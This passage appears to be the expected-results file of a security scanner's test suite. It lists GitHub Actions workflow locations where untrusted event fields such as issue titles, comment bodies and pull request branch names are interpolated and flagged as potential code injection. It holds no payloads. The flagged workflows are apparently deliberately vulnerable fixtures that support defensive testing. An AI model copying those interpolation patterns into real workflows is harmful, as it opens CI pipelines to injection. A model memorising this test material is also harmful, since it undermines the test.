.github/workflows/composite-action-caller-4.yml | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-3.yml | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-3.yml | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-3.yml | -| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | .github/workflows/argus_case_study.yml:4:3:4:8 | issues | .github/workflows/argus_case_study.yml | -| .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | .github/workflows/artifactpoisoning1.yml:4:3:4:14 | workflow_run | .github/workflows/artifactpoisoning1.yml | -| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | .github/workflows/artifactpoisoning2.yml:4:3:4:14 | workflow_run | .github/workflows/artifactpoisoning2.yml | -| .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | .github/workflows/artifactpoisoning3.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | ${{ steps.prepare.outputs.pr }} | .github/workflows/artifactpoisoning3.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning3.yml | -| .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | .github/workflows/artifactpoisoning4.yml:4:5:4:16 | workflow_run | .github/workflows/artifactpoisoning4.yml | -| .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | .github/workflows/artifactpoisoning5.yml:8:9:16:6 | Uses Step | .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | ${{ steps.artifact.outputs.content }} | .github/workflows/artifactpoisoning5.yml:3:5:3:16 | workflow_run | .github/workflows/artifactpoisoning5.yml | -| .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/artifactpoisoning6.yml:3:5:3:16 | workflow_run | .github/workflows/artifactpoisoning6.yml | -| .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | ${{ steps.artifact2.outputs.pr_number }} | .github/workflows/artifactpoisoning6.yml:3:5:3:16 | workflow_run | .github/workflows/artifactpoisoning6.yml | -| .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning7.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/artifactpoisoning7.yml:3:5:3:16 | workflow_run | .github/workflows/artifactpoisoning7.yml | -| .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning8.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | .github/workflows/artifactpoisoning8.yml:4:5:4:16 | workflow_run | .github/workflows/artifactpoisoning8.yml | -| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | -| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | -| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | -| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | -| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | -| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | -| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue.yml | -| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue_newline.yml | -| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue_newline.yml | -| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | .github/workflows/comment_issue_newline.yml | -| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | ${{ steps.foo.outputs.result }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | .github/workflows/composite-action-caller-3.yml | -| .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | .github/actions/action5/action.yml:28:16:28:45 | github.event.issue.body | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | ${{ steps.foo.outputs.result2 }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | .github/workflows/composite-action-caller-3.yml | -| .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | ${{ steps.clone.outputs.result }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | .github/workflows/composite-action-caller-4.yml | -| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | .github/workflows/discussion.yml:1:5:1:14 | discussion | .github/workflows/discussion.yml | -| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | .github/workflows/discussion.yml:1:5:1:14 | discussion | .github/workflows/discussion.yml | -| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | .github/workflows/discussion_comment.yml | -| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | .github/workflows/discussion_comment.yml | -| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | .github/workflows/discussion_comment.yml | -| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | .github/workflows/image_link_generator.yml:4:3:4:15 | issue_comment | .github/workflows/image_link_generator.yml | -| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/issues.yaml:1:5:1:10 | issues | .github/workflows/issues.yaml | -| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/issues.yaml:1:5:1:10 | issues | .github/workflows/issues.yaml | -| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | .github/workflows/issues.yaml | -| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | .github/workflows/issues.yaml | -| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | .github/workflows/issues.yaml | -| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | .github/workflows/json_wrap.yml | -| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | .github/workflows/json_wrap.yml | -| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | -| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | -| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | -| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/level1.yml:3:3:3:14 | workflow_run | .github/workflows/level1.yml | -| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | -| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | -| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | -| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | -| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | -| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | -| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | -| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | .github/workflows/pull_request_review.yml | -| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | -| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | -| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | -| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | -| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | -| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | -| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | -| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | -| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} 